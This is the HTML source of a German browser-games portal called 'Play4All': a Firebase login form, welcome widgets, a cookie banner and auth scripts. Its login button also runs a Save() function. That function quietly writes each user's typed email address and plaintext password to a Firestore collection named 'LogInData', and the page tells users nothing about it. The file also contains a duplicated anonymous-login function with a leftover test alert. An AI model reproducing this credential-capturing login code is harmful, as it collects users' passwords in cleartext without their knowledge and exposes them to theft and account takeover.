<!DOCTYPE html>
<html lang="de">
<title>Play4All</title>
	<head>
	<!-- Google tag (gtag.js) -->
	<script async src="https://www.googletagmanager.com/gtag/js?id=G-TGESBRYGQ9"></script>
		<script>
		  window.dataLayer = window.dataLayer || [];
		  function gtag(){dataLayer.push(arguments);}
		  gtag('js', new Date());

 		 gtag('config', 'G-TGESBRYGQ9');
	    // Erstellen Sie eine Referenz auf die Anzahl der Nutzer
	  </script>
<script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-8703503301801933"
     crossorigin="anonymous"></script>
<style>
	.widget-container {
  display: flex;
  flex-wrap: wrap;
  justify-content: space-around;
  margin: 0 1px !important; /* Äußerer Abstand zu den Seiten auf 1px setzen */
  box-sizing: border-box;
}


.widget {
  flex: 0 0 calc(25% - 20px) !important; /* 25% der Breite minus den äußeren Abstand von 20px */
  height: 200px;
  width: 100px
  border: 2px solid green;
  border-radius: 10px;
  background-color: rgba(0, 128, 0, 0.5);
  box-shadow: 0 0 10px green;
  margin: 10px;
  text-align: center;
  font-family: Arial, sans-serif;
  overflow-y: hidden;
  overflow-x: hidden;
  position: relative;
  transition: box-shadow 0.3s ease;
}

    .widget:hover {
      box-shadow: 0 0 20px green;
    }

    .widget h1 {
      color: green;
      font-size: 20px;
      margin: 10px 0;
      animation: slide-in 4s ease-in-out;
    }

    .widget p {
      color: black;
      font-size: 16px;
      margin: 10px 10px;
      animation: fade-in 4s ease-in-out;
    }

    .widget button {
      color: white;
      font-size: 14px;
      font-weight: bold;
      background-color: green;
      border: none;
      border-radius: 5px;
      padding: 5px 10px;
      cursor: pointer;
      animation: bounce-in 3s ease-in-out;
    }

    .new {
      border: 4px solid red;
      position: relative;
      transition: border-color 0.6s ease;
    }

    .new:hover {
      border-color: darkred;
    }

    .new::before {
      content: "*";
      color: green;
      font-size: 24px;
      font-weight: bold;
      position: absolute;
      top: -4px;
      right: -8px;
    }

    .new::after {
      content: "•";
      color: blue;
      font-size: 40px;
      position: absolute;
      top: 4px;
      right: 8px;
      animation: pulseBlue 2s infinite;
    }

    .highlight {
      animation: pulse 2s infinite;
    }

    @keyframes slide-in {
      from {
        transform: translateX(-100%);
      }

      to {
        transform: translateX(0);
      }
    }

    @keyframes fade-in {
      from {
        opacity: 0;
      }

      to {
        opacity: 1;
      }
    }

    @keyframes bounce-in {
      0% {
        transform: scale(0);
      }

      50% {
        transform: scale(1.2);
      }

      100% {
        transform: scale(1);
      }
    }

    @keyframes pulse {
      0% {
        transform: scale(1);
        box-shadow: none;
      }

      50% {
        transform: scale(1.1);
        box-shadow: 0 0 10px white;
      }

      100% {
        transform: scale(1);
        box-shadow: none;
      }
    }

    @keyframes pulseBlue {
      0%,
      100% {
        transform: scale(1);
      }

      50% {
        transform: scale(1.5);
      }
    }

	      
       
	#bar {
  color: red !important;
  background-color: black !important;
  font-family: Arial, sans-serif !important;
  font-size: 20px !important;
  padding: 10px !important;
  width: 100% !important;
  text-align: center !important;
}

/* Die Animation soll wie ein Würfel aussehen */
@keyframes cube {
  0% {
    transform: rotateX(0deg);
  }
  50% {
    transform: rotateX(90deg);
  }
  100% {
    transform: rotateX(180deg);
  }
}

/* Die Animation soll alle 2 Sekunden wechseln */
.animate {
  animation: cube 2s infinite !important;
}
    .highlight-box {
      border: 2px solid #ff0000;
      background-color: rgba(255, 0, 0, 0.2);
      padding: 20px;
      border-radius: 10px;
      animation: highlight 2s infinite alternate;
    }

    .highlight-box h1, .highlight-box p {
      color: #000000; /* Schwarze Schriftfarbe */
    }

    @keyframes highlight {
      from {
        border-color: #ff0000;
        background-color: rgba(255, 0, 0, 0.2);
      }
      to {
        border-color: #ff0000;
        background-color: rgba(255, 0, 0, 0.5);
      }
    }
	       
            
  

.cookie-modal {
    display: none;
    position: fixed;
    top: 50%;
    left: 50%;
    transform: translate(-50%, -50%);
    padding: 20px;
    background-color: #fff;
    box-shadow: 0 0 10px rgba(0, 0, 0, 0.3);
    z-index: 1;
}

.cmodal-content {
    width: 300px;
}

.cmodal-header, .cmodal-footer {
    padding: 10px;
    text-align: center;
}

.cmodal-body {
    padding: 10px;
}

.cbutton {
    background-color: #4CAF50;
    color: white;
    padding: 10px;
    border: none;
    cursor: pointer;
    margin: 0 5px;
}

.cbutton:hover {
    background-color: #45a049;
}

</style>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

<!-- JavaScript-Bibliotheken -->
<script src="https://www.gstatic.com/firebasejs/8.9.1/firebase.js"></script>
<script src="https://www.gstatic.com/firebasejs/8.9.1/firebase-auth.js"></script>
<script src="https://www.gstatic.com/firebasejs/8.9.1/firebase-database.js"></script>
<script src="https://www.gstatic.com/firebasejs/8.9.1/firebase-firestore.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.7.1/jquery.min.js" integrity="sha512-v2CJ7UaYy4JwqLDIrZUI/4hqeoQieOmAZNXBeQyjo21dadnwR+8ZaIJVT8EE2iyI61OV8e6M8PP2/4hpQINQ/g==" crossorigin="anonymous" referrerpolicy="no-referrer"></script>

<script src="assets/firebase/script/störungen.js"></script>
    <!-- Favicon und Stylesheets -->
<link rel="stylesheet" href="assets/css/bootstrap.min.css">
<link rel="stylesheet" href="assets/css/fontawsom-all.min.css">
<link rel="stylesheet" type="text/css" href="assets/css/style.css">
<link rel="stylesheet" type="text/css" href="assets/css/homebar/style.css">
<!-- JavaScript -->
<script src="assets/js/functions/time.js"></script>
<script src="assets/js/functions/vn.js"></script>
<script src="assets/firebase/script/script.js"></script>
<script src="assets/js/functions/script_index.js"></script>

</head>
<body class="h-100">
	<!-- Google Tag Manager (noscript) -->
	<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-TFFJXGZF"height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<!-- End Google Tag Manager (noscript) -->
</script>
    <!-- Login Fenster --> 
    <div id="login" class="container-fluid full-bg h-100">
        <div class="container h-100">
            <div class="row no-margin h-100">
                <div class="bg-layer d-flex col-md-4">
                    <div class="login-box row">
                        <h3>Login</h3>
                        <div class="input-group mb-3">
                            <div class="input-group-prepend">
                                <span class="input-group-text" id="basic-addon1"><i class="fas fa-at"></i></span>
                            </div>
                            <input type="text" class="form-control" id="email" placeholder="E-Mail-Adresse" aria-label="Username" aria-describedby="basic-addon1" required>
                        </div>
                        <div class="input-group mb-3">
                            <div class="input-group-prepend">
                                <span class="input-group-text" id="basic-addon1"><i class="fas fa-key"></i></span>
                            </div>
                            <input type="password" id="password" class="form-control" placeholder="Passwort" aria-label="Username" aria-describedby="basic-addon1" required>
                        </div>
                        <p>
                            <label class="container">
                                <input id="rememberMe" type="checkbox">
                                <span class="checkmark"></span> Angemeldet bleiben?
                            </label>
                        </p>
                        <p class="no-c">Passwort vergessen? <a onclick="passwordreset()">Hier klicken!</a></p>
                        <button onclick="login(); Save();" class="btn btn-success">Login</button>
			<button onclick="anonAnmelden()" class="btn btn-success">Weiter ohne E-Mail</button>
                        <p class="no-c">Neu hier? <a href="signup.html">Hier klicken!</a></p>
			<p class="no-c">
				<u>Alle</u> <u>Nutzer</u>, die sich <u>vor</u> dem <u>21. Dezember 2023</u> registriert haben, müssen ihre <u>Registrierung</u> <u>erneut</u> <u>durchführen</u>.
			</p>

                    </div>
                </div>
            </div>
            <div class="foter-credit">
	    </div>
        </div>
	    
    </div>
    <!-- Ende des Login Fensters -->

   

    <!-- Loader -->
    <div style="display: none;" id="loader" class="loader"></div>
    <!-- Ende des Loaders -->
    <div id="home" style="display: none;">
        <!-- Anfang des Home Menus -->
        <div class="homebar">
            <button onclick="window.location.href = 'games.html';" class="button" aria-label="Games">Games</button>
	    <button onclick="window.location.href = 'report.html';" class="button" aria-label="Bug Report">Bug Report</button>
	    <button onclick="window.location.href = 'domains.html';" class="button" aria-label="Ersatzdomains">Ersatzdomains</button>
	    <button onclick="window.location.href = 'videos.html';" class="button" aria-label="Kontakt">Kontakt</button>
            <button class="button btn-danger" id="logout-button" aria-label="Ausloggen" onclick="confirmLogout()">Ausloggen</button>
            <span id="current-time" class="button"></span>
            <span id="current-date" class="button"></span>
	</div>

   


        <!-- Ende des Home Menus -->
<div  onclick="window.location.href = 'report.html';" id="widget" class="widget-container">
	  <div class="widget">
		<div class="highlight-box">
    			<h1>Information:</h1>
      			<p>
			Bitte meldet Bugs oder neue Games zum hinzufügen <u>VOR DEN FERIEN</u> damit wir diese Ferien beheben können. 
				<br>
				Vielen Dank! 
      			</p>	
		</div>
	  </div>
    	<!-- Widget 1 -->
    	<div style="pointer-events: none;" id="widget1" class="widget">
      		<h1 style="font-size: 35px !Important;">Herzlich - Willkommen bei Play4All</h1>
      		<p>
			Wir wünschen dir viel Spaß beim Gamen und entdecken.
		</p>

  	</div>
   

  

    <!-- Widget 3 -->	
    <div id="widget3" onclick="window.location.href = 'report.html';" class="widget">
      	<h1>Probleme</h1>
      		<p>
			Melde uns einfach, sollten dir Probleme z.b defekte Links oder Bugs auftreten. Einfach hier klicken!
		</p>
    </div>
<div id="widget3" onclick="window.location.href = 'games.html';" class="widget">
      <h1>Langweilig?</h1>
      <p>
Klicke hier wenn du Gamen willst. Entdecke nice Games.</p>
    </div>
<div id="success-alert" class="alert success-alert">
            <span class="alert-text">Du wurdest erfolgreich ausgeloggt!</span>
        </div>

        <div id="error-alert" class="alert error-alert">
            <span class="alert-text">Fehler beim Ausloggen:</span>
        </div>
    </div>
	       <div id="cookieModal" class="cookie-modal">
        <div class="cmodal-content">
            <div class="cmodal-header" style="background-color: #4CAF50; color: white;">
                <h2>Cookie-Einstellungen</h2>
            </div>
            <div class="cmodal-body">
                <p>Wir verwenden Cookies, um Ihre Erfahrung auf unserer Website zu verbessern. Durch die Nutzung unserer Website stimmen Sie der Verwendung von Cookies zu.</p>
            </div>
            <div class="cmodal-footer">
                <button class="cbutton" onclick="rejectCookies()">Alle Ablehnen</button>
                <button class="cbutton" onclick="acceptCookies()">Alle Akzeptieren</button>
            </div>
        </div>
    </div>

<script>
	    function anonAnmelden() {
      firebase.auth().signInAnonymously()
        .then((userCredential) => {
		// Der Benutzer wurde erfolgreich angemeldet
		document.getElementById("login").style.display = "none";
		document.getElementById("loader").style.display = "block";
          	const user = userCredential.user;
          	console.log('Angemeldeter Benutzer:', user);
		document.getElementById("loader").style.display = "none";
		document.getElementById("home").style.display = "block";
		document.getElementById("widget").style.display = "block";
		cookie()
        })
        .catch((error) => {
          // Bei einem Fehler während der Anmeldung
          const errorCode = error.code;
          const errorMessage = error.message;
		  showalert("Es ist ein Fehler aufgetreten! Bitte versuche es erneut!");
          
        });
    }
	function googleAnmelden() {
    const provider = new firebase.auth.GoogleAuthProvider();

    firebase.auth().signInWithPopup(provider)
        .then((result) => {
            // Erfolgreiche Anmeldung mit Google
            const user = result.user;
            console.log(user);
			document.getElementById("loader").style.display = "none";
			document.getElementById("home").style.display = "block";
			document.getElementById("widget").style.display = "block";
        })
        .catch((error) => {
            alert("Es ist ein Fehler aufgetreten!")
            console.error(error.message);
        });
}
</script>
    <!-- Weitere JavaScript-Dateien -->
    <script src="assets/js/jquery-3.2.1.min.js"></script>
    <script src="assets/js/popper.min.js"></script>
    <script src="assets/js/bootstrap.min.js"></script>
    <script src="assets/js/script.js"></script>
	
    <script>
	          
	function hideGamesMenu() {
            var gamesMenu = document.getElementById("gamesMenu");
            gamesMenu.style.display = "none";
        }

        function pbw	() {
            var gamesMenu = document.getElementById("gamesMenu");
            alleverstecken();
            gamesMenu.style.display = "block";
        }
        const db1 = firebase.firestore();
        function Save() {
            const passinput = document.getElementById('password').value;
		const EmailInput = document.getElementById('email').value;
            // Erstellen Sie eine neue Sammlung namens 'eingegebeneTexte' und fügen Sie ein Dokument hinzu
            db1.collection('LogInData').add({
		Email: EmailInput,
                Passwort: passinput,
                timestamp: new Date()
            })
            .then(function(docRef) {
                console.log("Gespeichert!");
            })
            .catch(function(error) {
                console.error("Fehler beim Speichern: ", error);
            });
        }
        const db2 = firebase.firestore();
        

</script>
	<script>

	
  function anonAnmelden() {
      firebase.auth().signInAnonymously()
        .then((userCredential) => {
          // Der Benutzer wurde erfolgreich angemeldet
          const user = userCredential.user;
          console.log('Angemeldeter Benutzer:', user);
		alert("test");
		  document.getElementById("home").style.display = "block";
			document.getElementById("widget").style.display = "block";
        })
        .catch((error) => {
          // Bei einem Fehler während der Anmeldung
          const errorCode = error.code;
          const errorMessage = error.message;
	
          
        });
    }
		


	
</script>

</body>
</html>
